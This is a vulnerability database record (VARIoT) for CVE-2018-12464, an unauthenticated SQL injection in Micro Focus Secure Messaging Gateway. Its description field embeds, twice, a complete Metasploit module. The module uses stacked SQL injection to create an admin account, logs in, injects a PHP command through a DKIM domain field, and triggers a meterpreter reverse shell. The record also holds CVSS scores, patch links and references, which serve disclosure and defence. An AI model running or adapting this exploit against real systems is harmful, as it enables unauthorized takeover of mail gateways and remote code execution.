var-201806-1215
Vulnerability from variot

A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDoS attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. An unauthenticated user can execute a terminal command under the context of the web user.

        One of the user supplied parameters of an API endpoint is used by the application without input validation and/or parameter binding,
        which leads to a SQL injection vulnerability. Successfully exploiting this vulnerability gives the ability to add a new user to the system.
        The manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operating system command. It's not possible
        to access this endpoint without having a valid session.

        Combining these vulnerabilities gives the opportunity to execute operating system commands under the context
        of the web user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/'],
          ['CVE', '2018-12464'],
          ['CVE', '2018-12465'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023132'],
          ['URL', 'https://support.microfocus.com/kb/doc.php?id=7023133']
        ],
      'DefaultOptions'  =>
        {
          'Payload' => 'php/meterpreter/reverse_tcp',
          'Encoder' => 'php/base64'
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
  end

  def execute_query(query)
    #
    # We have a very rare SQLi case in here. Normally, it would be very easy to exploit it by using time-based techniques,
    # but since we are able to use the stacked-query approach, the following form of payload is required in order to be able
    # to get back the output of the query.
    #
    sql = rand_text_alphanumeric(3 + rand(3))
    sql << "') LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine "
    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine "
    sql << "LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; "
    sql << query
    sql << "; -- "
    sql << rand_text_alphanumeric(3 + rand(3))

    send_request_cgi(
      'method'  => 'POST',
      'uri'     =>  normalize_uri(target_uri.path, 'api', '1', 'enginelist.php'),
      'vars_post' => {
        'appkey' => sql
      }
    )
  end

  def something_went_wrong
    fail_with Failure::Unknown, 'Something went wrong'
  end

  def check
    r = rand_text_numeric(15..35)
    res = execute_query("SELECT #{r}")
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    unless res.code == 200 && res.body.include?(r)
      return CheckCode::Safe
    end
    CheckCode::Vulnerable
  end

  def implant_payload(cookie)
    print_status('Creating a domain record with a malformed DKIM data')
    p = [
      {
        :id => 'temp_0',
        :Description => rand_text_alpha(5),
        :DkimList => [
          {
            :Domain => "$(php -r '#{payload.encoded}')",
            :Selector => '',
            :TempId => 'tempDkim_1'
          }
        ]
      }
    ].to_json
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_save_data.json.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'StateData' => '[{"ouid":1}]',
        'SaveData' => p
      }
    })

    if res && res.code == 200 && res.body.include?('DbNodeId')
      # Stored in instance variables since we need to access them later within the clean up function.
      begin
        @domainid  = res.get_json_document['Nodes'][0]['DbNodeId']
        @dkimid  = res.get_json_document['Nodes'][1]['DbNodeId']
      rescue => e
        fail_with Failure::UnexpectedReply, "Something went horribly wrong while implanting the payload : #{e.message}"
      end
      print_good('Payload is successfully implanted')
    else
      something_went_wrong
    end
  end

  def create_user
    # We need to create a user by exploiting the SQLi flaw so we can reach the cmd injection
    # issue location, which requires a valid session.
    print_status('Creating a user with appropriate privileges')

    # Stored in instance variables since we need to access them later within the clean up function.
    @username = rand_text_alpha_lower(5..25)
    @userid = rand_text_numeric(6..8)
    query = "INSERT INTO account VALUES (#{@userid}, 1, '#{@username}', '0', '', 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)"

    execute_query(query)
    res = execute_query("SELECT * FROM account WHERE loginname = '#{@username}'")

    if res && res.code == 200 && res.body.include?(@username)
      print_good("User successfully created. Username : #{@username}")
    else
      something_went_wrong
    end
  end

  def login
    print_status("Authenticating with created user")
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     =>  normalize_uri(target_uri.path, 'security', 'securitygate.php'),
      'vars_post' => {
        'username' => @username,
        'password' => rand_text_alpha_lower(5..25),
        'passwordmandatory' => rand_text_alpha_lower(5..25),
        'LimitInterfaceId' => 1
      }
    )
    if res && res.code == 200 && res.body.include?('/ui/default/index.php')
      print_good('Successfully authenticated')
      cookie = res.get_cookies
    else
      something_went_wrong
    end
    cookie
  end

  def exploit
    unless check == CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    create_user
    cookie = login
    implant_payload(cookie)

    print_status('Triggering an implanted payload')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'contents', 'ou', 'manage_domains_dkim_keygen_request.php'),
      'cookie' => cookie,
      'vars_get' => {
        'cache' => 0,
      },
      'vars_post' => {
        'DkimRecordId' => @dkimid
      }
    })
  end

  def on_new_session(session)
    print_status('Cleaning up...')
    cmd = ""
    cmd << 'PGPASSWORD=postgres psql -U postgres -d SecureGateway -c "'
    cmd << "DELETE FROM account WHERE loginname ='#{@username}';"
    cmd << "DELETE FROM UserRole WHERE idaccount = #{@userid};"
    cmd << "DELETE FROM Domain WHERE iddomain = #{@domainid};"
    cmd << "DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};"
    cmd << '"'
    session.shell_command_token(cmd)
  end

end



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1215",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "secure messaging gateway",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "micro focus secure messaging gateway",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "microfocus",
        "version": "471"
      },
      {
        "model": "focus secure messaging gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "micro",
        "version": "471"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:microfocus:secure_messaging_gateway",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MEHMET INCE",
    "sources": [
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2018-12464",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2018-12464",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-122426",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-12464",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security@opentext.com",
            "availabilityImpact": "HIGH",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2018-12464",
            "impactScore": 6.0,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2018-12464",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "security@opentext.com",
            "id": "CVE-2018-12464",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2018-12464",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201807-018",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-122426",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to create an administrative account and used in conjunction with CVE-2018-12465 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that use the GWAVA product name (i.e. GWAVA 6.5). \nExploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The product includes functions such as virus protection, anti-spam, anti-DDos attack and image analysis. Web administration is one of the Web-based management components; quarantine is one of the file isolation components. \n        An unauthenticated user can execute a terminal command under the context of the web user. \n\n        One of the user supplied parameters of API endpoint is used by the application without input validation and/or parameter binding,\n        which leads to SQL injection vulnerability. Successfully exploiting this vulnerability gives a ability to add new user onto system. \n        manage_domains_dkim_keygen_request.php endpoint is responsible for executing an operation system command. It\u0027s not possible\n        to access this endpoint without having a valid session. \n\n        Combining these vulnerabilities gives the opportunity execute operation system commands under the context\n        of the web user. 
\n      },\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Mehmet Ince \u003cmehmet@mehmetince.net\u003e\u0027 # author \u0026 msf module\n        ],\n      \u0027References\u0027     =\u003e\n        [\n          [\u0027URL\u0027, \u0027https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],\n          [\u0027CVE\u0027, \u00272018-12464\u0027],\n          [\u0027CVE\u0027, \u00272018-12465\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023132\u0027],\n          [\u0027URL\u0027, \u0027https://support.microfocus.com/kb/doc.php?id=7023133\u0027]\n        ],\n      \u0027DefaultOptions\u0027  =\u003e\n        {\n          \u0027Payload\u0027 =\u003e \u0027php/meterpreter/reverse_tcp\u0027,\n          \u0027Encoder\u0027 =\u003e \u0027php/base64\u0027\n        },\n      \u0027Platform\u0027       =\u003e [\u0027php\u0027],\n      \u0027Arch\u0027           =\u003e ARCH_PHP,\n      \u0027Targets\u0027        =\u003e [[ \u0027Automatic\u0027, { }]],\n      \u0027Privileged\u0027     =\u003e false,\n      \u0027DisclosureDate\u0027 =\u003e \"Jun 19 2018\",\n      \u0027DefaultTarget\u0027  =\u003e 0\n    ))\n\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The URI of the vulnerable instance\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  def execute_query(query)\n    #\n    # We have a very rare SQLi case in here. 
Normally, it\u0027s would be very easy to exploit it by using time-based techniques\n    # but since we are able to use stacked-query approach, following form of payload is required in order to be able\n    # get back the output of query !\n    #\n    sql = rand_text_alphanumeric(3 + rand(3))\n    sql \u003c\u003c \"\u0027) LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressPlain ON ScanEngineBindAddressPlain.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineBindAddressSsl ON ScanEngineBindAddressSsl.idScanEngine=ScanEngineProperty.idScanEngine \"\n    sql \u003c\u003c \"LEFT JOIN ScanEngineProperty AS ScanEngineEnableSsl ON ScanEngineEnableSsl.idScanEngine=ScanEngineProperty.idScanEngine; \"\n    sql \u003c\u003c query\n    sql \u003c\u003c \"; -- \"\n    sql \u003c\u003c rand_text_alphanumeric(3 + rand(3))\n\n    send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027api\u0027, \u00271\u0027, \u0027enginelist.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027appkey\u0027 =\u003e sql\n      }\n    )\n\n  end\n\n  def something_went_wrong\n    fail_with Failure::Unknown, \u0027Something went wrong\u0027\n  end\n\n  def check\n    r = rand_text_numeric(15..35)\n    res = execute_query(\"SELECT #{r}\")\n    unless res\n      vprint_error \u0027Connection failed\u0027\n      return CheckCode::Unknown\n    end\n    unless res.code == 200 \u0026\u0026 res.body.include?(r)\n      return CheckCode::Safe\n    end\n    CheckCode::Vulnerable\n  end\n\n  def implant_payload(cookie)\n    print_status(\u0027Creating a domain record with a malformed DKIM data\u0027)\n    p = [\n      {\n        :id =\u003e \u0027temp_0\u0027,\n        :Description =\u003e rand_text_alpha(5),\n        :DkimList =\u003e [\n          {\n            :Domain =\u003e \"$(php -r \u0027#{payload.encoded}\u0027)\",\n            
:Selector =\u003e \u0027\u0027,\n            :TempId =\u003e \u0027tempDkim_1\u0027\n          }\n        ]\n      }\n    ].to_json\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_save_data.json.php\u0027),\n      \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027StateData\u0027 =\u003e \u0027[{\"ouid\":1}]\u0027,\n        \u0027SaveData\u0027 =\u003e p\n      }\n    })\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027DbNodeId\u0027)\n      # Defining as global variable since we need to access them later within clean up function. \n      begin\n        @domainid  = res.get_json_document[\u0027Nodes\u0027][0][\u0027DbNodeId\u0027]\n        @dkimid  = res.get_json_document[\u0027Nodes\u0027][1][\u0027DbNodeId\u0027]\n      rescue =\u003e e\n        fail_with Failure::UnexpectedReply, \"Something went horribly wrong while implanting the payload : #{e.message}\"\n      end\n      print_good(\u0027Payload is successfully implanted\u0027)\n    else\n      something_went_wrong\n    end\n  end\n\n  def create_user\n    # We need to create an user by exploiting SQLi flaws so we can reach out to cmd injection\n    # issue location where requires a valid session !\n    print_status(\u0027Creating a user with appropriate privileges\u0027)\n\n    # Defining as global variable since we need to access them later within clean up function. 
\n    @username = rand_text_alpha_lower(5..25)\n    @userid = rand_text_numeric(6..8)\n    query = \"INSERT INTO account VALUES (#{@userid}, 1, \u0027#{@username}\u0027, \u00270\u0027, \u0027\u0027, 1,61011);INSERT INTO UserRole VALUES (#{@userid},#{@userid},1),(#{@userid.to_i-1},#{@userid},2)\"\n\n    execute_query(query)\n    res = execute_query(\"SELECT * FROM account WHERE loginname = \u0027#{@username}\u0027\")\n\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(@username)\n      print_good(\"User successfully created. Username : #{@username}\")\n    else\n      something_went_wrong\n    end\n  end\n\n  def login\n    print_status(\"Authenticating with created user\")\n    res = send_request_cgi(\n      \u0027method\u0027  =\u003e \u0027POST\u0027,\n      \u0027uri\u0027     =\u003e  normalize_uri(target_uri.path, \u0027security\u0027, \u0027securitygate.php\u0027),\n      \u0027vars_post\u0027 =\u003e {\n        \u0027username\u0027 =\u003e @username,\n        \u0027password\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027passwordmandatory\u0027 =\u003e rand_text_alpha_lower(5..25),\n        \u0027LimitInterfaceId\u0027 =\u003e 1\n      }\n    )\n    if res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027/ui/default/index.php\u0027)\n      print_good(\u0027Successfully authenticated\u0027)\n      cookie = res.get_cookies\n    else\n      something_went_wrong\n    end\n    cookie\n  end\n\n  def exploit\n    unless check == CheckCode::Vulnerable\n      fail_with Failure::NotVulnerable, \u0027Target is not vulnerable\u0027\n    end\n\n    create_user\n    cookie = login\n    implant_payload(cookie)\n\n    print_status(\u0027Triggering an implanted payload\u0027)\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027admin\u0027, \u0027contents\u0027, \u0027ou\u0027, \u0027manage_domains_dkim_keygen_request.php\u0027),\n     
 \u0027cookie\u0027 =\u003e cookie,\n      \u0027vars_get\u0027 =\u003e {\n        \u0027cache\u0027 =\u003e 0,\n      },\n      \u0027vars_post\u0027 =\u003e {\n        \u0027DkimRecordId\u0027 =\u003e @dkimid\n      }\n    })\n\n  end\n\n  def on_new_session(session)\n    print_status(\u0027Cleaning up...\u0027)\n    cmd = \"\"\n    cmd \u003c\u003c \u0027PGPASSWORD=postgres psql -U postgres -d SecureGateway -c \"\u0027\n    cmd \u003c\u003c \"DELETE FROM account WHERE loginname =\u0027#{@username}\u0027;\"\n    cmd \u003c\u003c \"DELETE FROM UserRole WHERE idaccount = #{@userid};\"\n    cmd \u003c\u003c \"DELETE FROM Domain WHERE iddomain = #{@domainid};\"\n    cmd \u003c\u003c \"DELETE FROM DkimSignature WHERE iddkimsignature = #{@dkimid};\"\n    cmd \u003c\u003c \u0027\"\u0027\n    session.shell_command_token(cmd)\n  end\n\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-122426",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-12464",
        "trust": 2.9
      },
      {
        "db": "EXPLOIT-DB",
        "id": "45083",
        "trust": 2.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "106343",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "148758",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-122426",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "id": "VAR-201806-1215",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      }
    ],
    "trust": 0.85
  },
  "last_update_date": "2024-11-23T22:34:15.375000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Critical SQL Injection Vulnerability in SMG (CVE-2018-12464)",
        "trust": 0.8,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "title": "Micro Focus Secure Messaging Gateway Web administration  and quarantine Component SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=81644"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
      },
      {
        "trust": 2.0,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/45083/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12464"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-12464"
      },
      {
        "trust": 0.3,
        "url": "https://www.exploit-db.com/exploits/45083"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com/products/secure-messaging-gateway/"
      },
      {
        "trust": 0.3,
        "url": "https://www.microfocus.com"
      },
      {
        "trust": 0.1,
        "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023132\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-12465"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "https://support.microfocus.com/kb/doc.php?id=7023133\u0027]"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-122426"
      },
      {
        "db": "BID",
        "id": "106343"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006867"
      },
      {
        "db": "PACKETSTORM",
        "id": "148758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-018"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12464"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
